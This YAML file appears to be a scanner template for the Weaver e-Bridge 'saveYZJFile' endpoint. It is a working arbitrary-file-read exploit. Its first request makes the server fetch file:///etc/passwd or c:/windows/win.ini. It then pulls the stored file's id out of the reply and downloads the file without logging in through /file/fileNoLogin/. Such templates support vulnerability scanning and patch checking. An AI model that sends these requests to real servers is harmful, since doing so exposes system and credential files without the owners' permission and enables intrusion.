name: weaver-ebridge-saveyzjfile-file-read
groups:
  linux:
    - method: GET
      path: "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc//passwd&fileExt=txt"
      expression: |
        response.status == 200 && response.body.bcontains(b'"isencrypt":') && response.body.bcontains(b'"isdelete":')
      output:
        search: '"\\\"id\\\"\\:\\\"(?P<var>.+?)\\\"\\,".bsubmatch(response.body)'
        var: search["var"]
      stop_if_match: true
    - method: GET
      before_sleep: 2
      path: "/file/fileNoLogin/{{var}}"
      expression: |
        response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
  windows:
    - method: GET
      path: "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt"
      expression: |
        response.status == 200  && response.body.bcontains(b'"isencrypt":') && response.body.bcontains(b'"isdelete":')
      output:
        search2: '"\\\"id\\\"\\:\\\"(?P<var>.+?)\\\"\\,".bsubmatch(response.body)'
        var: search2["var"]
      stop_if_mismatch: true
    - method: GET
      before_sleep: 2
      path: "/file/fileNoLogin/{{var}}"
      expression: |
        response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]"))
      
detail:
  author: 666